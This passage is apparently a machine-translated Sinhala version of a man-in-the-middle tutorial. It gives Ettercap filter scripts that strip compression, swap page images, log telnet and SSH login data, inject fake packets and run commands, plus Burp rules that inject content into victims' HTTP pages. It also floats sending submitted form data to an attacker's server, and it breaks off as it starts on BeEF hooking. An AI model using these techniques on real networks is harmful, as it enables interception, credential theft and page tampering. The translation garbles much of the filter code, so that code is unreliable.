නම් (ip.proto == TCP && tcp.dst == 80) (සෙවීම(DATA.data, "Accept-Encoding")) (ප්‍රතිස්ථාපනය ("පිළිගන්න-කේතනය", "පිළිගන්න-කුණු!"); # සටහන: ප්‍රතිස්ථාපන තන්තුව මුල් msg ("zapped Accept-Encoding!\n"); ) ) නම් (ip.proto == TCP && tcp.src == 80) (replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); ප්‍රතිස්ථාපනය ("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png \" "); ප්‍රතිස්ථාපනය ("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); ප්‍රතිස්ථාපනය("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("ෆිල්ටර් රන්.\n"); )

ගොනුව සම්පාදනය කරන්න:

Etterfilter img_replacer.filter -o img_replacer.ef

සම්පාදනය කිරීමේ ප්රතිඵල:

Etterfilter 0.8.2 ප්‍රකාශන හිමිකම 2001-2015 Ettercap සංවර්ධන කණ්ඩායම 14 ප්‍රොටෝකෝල වගු පූරණය කර ඇත: විකේතනය කරන ලද දත්ත udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth eth Ap arp wifi fddi tr eth 13 Aprp mpICPF GRE නියතයන් පූරණය කරන ලදී PRPPICP6 ParPIPCPF GRE "img_replacer.filter" නිමයි. මෙටා ගස දිග හැරීම සිදු කර ඇත. ලේබල් සැබෑ ඕෆ්සෙට් බවට පරිවර්තනය කිරීම සිදු කර ඇත. "img_replacer.ef" වෙත ප්‍රතිදානය ලිවීම සිදු කර ඇත. -> ස්ක්‍රිප්ට් උපදෙස් 18කට කේතනය කර ඇත.

යතුර -එෆ්යතුර අනුගමනය කරන ගොනුවෙන් පෙරහන පැටවීමට වැඩසටහනට කියයි. සම්පාදනය කිරීමෙන් පසුව, පෙරහන සහිත අපගේ නව ගොනුවේ නම img_replacer.ef වේ, එම නිසා විධානය වන්නේ:

Ettercap -G -F img_replacer.ef

සටහන A: ඔබ වෙබ් ගමනාගමනය නිරීක්ෂණය කරන විට, ඔබ දකින පැකට් සංකේතාත්මක ආකාරයෙන් විය හැක. සදහා ඵලදායී වැඩපෙරහන්, Ettercap පෝරමයේ ගමනාගමනය අවශ්‍යයි සරල පෙළ. සමහර නිරීක්ෂණ වලට අනුව, වෙබ් පිටු භාවිතා කරන කේතීකරණ වර්ගය "පිළිගන්න-කේතනය: gzip, deflate"

පහත දැක්වෙන්නේ සරල පෙළ ආකාරයෙන් සන්නිවේදනය කිරීමට බල කරමින් කේතනය නැවත ලියන පෙරහනකි:

නම් (ip.proto == TCP && tcp.dst == 80) (if (search(DATA.data, "gzip")) (Replace("gzip", " "); # note: msg string හි හිස් හතරක් ප්‍රතිස්ථාපනය කරන්න ("whited out gzip\n"); ) ) නම් (ip.proto == TCP && tcp.dst == 80) ((සෙවුම්(DATA.data, "deflate") නම්) (ප්‍රතිස්ථාපනය ("deflate", ""); # සටහන: ප්‍රතිස්ථාපන තන්තුවෙහි හිස්තැන් හතක් පණිවිඩය("whited out deflate\n"); ) )

පෙරහන් ලිවීමේ වාක්‍ය ඛණ්ඩය විස්තරාත්මකව විස්තර කර ඇති අතර තවත් උදාහරණ කිහිපයක්:

# පැකට්ටුවේ පෙළ ප්‍රතිස්ථාපනය කරන්න: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter ran"); ) # පණිවිඩය පෙන්වන්න tcp port එක 22 නම් (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # සියලුම ටෙල්නෙට් ගමනාගමනය ලොග් කරන්න , (ip.proto == TCP) නම් (tcp.src == 23 || tcp.dst == 23) (ලොග්(DATA.data, "./logfile.log ") නම් පැකට්ටුවකට ./වැඩසටහනක් ක්‍රියාත්මක කරන්න ; exec("./program"); ​​) ) # http හැර අනෙකුත් ගමනාගමනය ලොග් කරන්න "./logfile.log"); ) # (DATA.data + 20 == 0x4142) (DATA.data + 20 = 0x4243; ) වෙනත් (DATA.data = "වෙනස් කළ"; DATA .data + නම් සමහර පැකට් ගෙවීම් මෙහෙයුම් 20 = 0x4445, ); නම් (tcp.src == 22 || tcp.dst == 22) ((regex(DECODED.data, ".*login.*")) (log(DECODED.data, "./decrypted_log"); ) ) ) # කිලිං පැකට් නම් (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Burp සමඟ දත්ත වංචා කිරීම

අපි 1.2 ඡේදයේ හෝ 2.2 ඡේදයේ විස්තර කර ඇති පරිදි Ettercap සහ Burp දියත් කරමු.

බර්ප් එකේ යන්න ප්‍රොක්සි -> විකල්ප. අපි එතන හොයාගන්නවා ගැලපීම සහ ප්රතිස්ථාපනය කරන්න. ක්ලික් කරන්න එකතු කරන්නනව රීතියක් එකතු කිරීමට.

  • ඉල්ලීම් ශීර්ෂකයඉල්ලීම් ශීර්ෂයයි
  • ඉල්ලීම ශරීරය- ඉල්ලීම ශරීරය
  • ප්රතිචාර ශීර්ෂය- ප්රතිචාර ශීර්ෂය
  • ප්රතිචාර ශරීරය- ප්රතිචාර ශරීරය
  • පරාම නාමය ඉල්ලන්න- විමසුම් පරාමිතිය නම
  • පරාමිතිය අගය ඉල්ලන්න- ඉල්ලීම් පරාමිති අගය
  • පළමු පේළිය ඉල්ලන්න- විමසුමේ පළමු පේළිය

ඔබට GET ක්‍රමය මඟින් සම්ප්‍රේෂණය වන දත්ත වෙනස් කිරීමට අවශ්‍ය නම්, මෙය ශීර්ෂයන්ට අදාළ වේ.

HTML සලකුණු කිරීමේදී, හිස (හිස ටැගය) වැනි දෙයක් ද ඇත. ඉහත සඳහන් කළ අයට මෙම මාතෘකාව සමඟ කිසිදු සම්බන්ධයක් නැත. පැකට් ශීර්ෂයන් ගැන ටිකක් ඉහළින් කියනු ලැබේ. ඔබට අන්තර්ගතය වෙනස් කිරීමට අවශ්‍ය නම් HTML පිටු, එවිට ඔබ හිස ටැගයේ අන්තර්ගතය (උදාහරණයක් ලෙස, මාතෘකාව) වෙනස් කිරීමට යන්නේ වුවද, ඔබ සැම විටම ඉල්ලීම් ශීර්ෂකය වෙනුවට ප්‍රතිචාර ශරීරය තෝරාගත යුතුය.

ඔබ හුරුපුරුදු නැතිනම් නිතිපතා ප්රකාශන, එසේ නම්, ප්‍රතිපත්තිමය වශයෙන්, එය කමක් නැත: HTML බොහෝ දේ සමාව දෙයි, සහ එය තේරුම් නොගන්නා දේ, එය සරලව නොසලකා හරියි - ඔබට එය භාවිතා කළ හැකිය. සාමාන්‍ය ප්‍රකාශන භාවිතා කරන්නේ කෙසේදැයි ඔබ දන්නේ නම්, මම ඔබට ගරු කරමි.)))

උදාහරණයක් ලෙස, අපි නව රීතියක් නිර්මාණය කරමු, Request header එක Response body ලෙස වෙනස් කරමු. රීතිය තුළම අපි වෙනස් වෙමු

.*<\/title> </p><p> <title>මාතෘකාවක් නැත

කොටුව පරීක්ෂා කරන්න Regex තරගය.

දැන් සියලුම අඩවි වල (HTTPS නොමැතිව) මාතෘකාව වෙනුවට මාතෘකාවක් නොමැත:

ශරීර ටැගයට පසුව අත්තනෝමතික රේඛාවක් ඇතුළු කරන්න (එය පෙළෙහි පළමු පේළිය වනු ඇත). ඉල්ලීම් ශීර්ෂකය ප්‍රතිචාර ශරීරයට වෙනස් කර ඇත. අපි වෙනස් වෙනවා

කොටුව පරීක්ෂා කරන්න Regex තරගය.

ඉහළ දකුණු කෙළවරේ (පිරිසැලසුම මත පදනම්ව) "මම සිසිල්!" සෙල්ලිපිය දිස්වේ. ඔබට CSS, JavaScript කේතය, ඕනෑම පෙළ - ඕනෑම දෙයක් ඇතුළත් කළ හැකිය. ඔබට සාමාන්‍යයෙන් පිටුවෙන් සියල්ල මකා දැමිය හැකිය, ඉන්පසු එය ඔබේම අන්තර්ගතයෙන් පුරවන්න - ඒ සියල්ල ඔබගේ පරිකල්පනය මත රඳා පවතී.

දත්ත මුල් සේවාදායකයට සහ ප්‍රහාරකයාගේ සේවාදායකයට යැවීමට (එක් එක් පෝරමය සඳහා බහු ඉදිරිපත් කිරීම් ක්‍රියාත්මක කරන්න) එක් එක් පෝරමය සුළු වශයෙන් වෙනස් කිරීමට අදහසක් තිබුණි. නමුත් සම්ප්‍රේෂණය කරන ලද දත්ත සංකේතනය කර නොමැති නම් සහ අපට එයට ප්‍රවේශය තිබේ නම්, අපි එය කෙසේ හෝ දකිනවා නම්, අපට එය කිසිදු සේවාදායකයකට යැවීමට අවශ්‍ය නොවන බව තර්ක කර ඇත. එසේ වුවද, යමෙකුට එය අවශ්‍ය නම්, එක් පෝරමයකින් එකවර සේවාදායකයන් කිහිපයකට දත්ත යැවීමේ සැබවින්ම ක්‍රියාකාරී උදාහරණයක්.

5. BeEF hookup

BeEF විශේෂාංග භාවිතා කිරීම ආරම්භ කිරීමට, අපට සාමාන්‍යයෙන් මෙවැනි පේළියක් වන HTML හි JavaScript ගොනුවක් කාවැද්දීමට අවශ්‍ය වේ:




ඉහල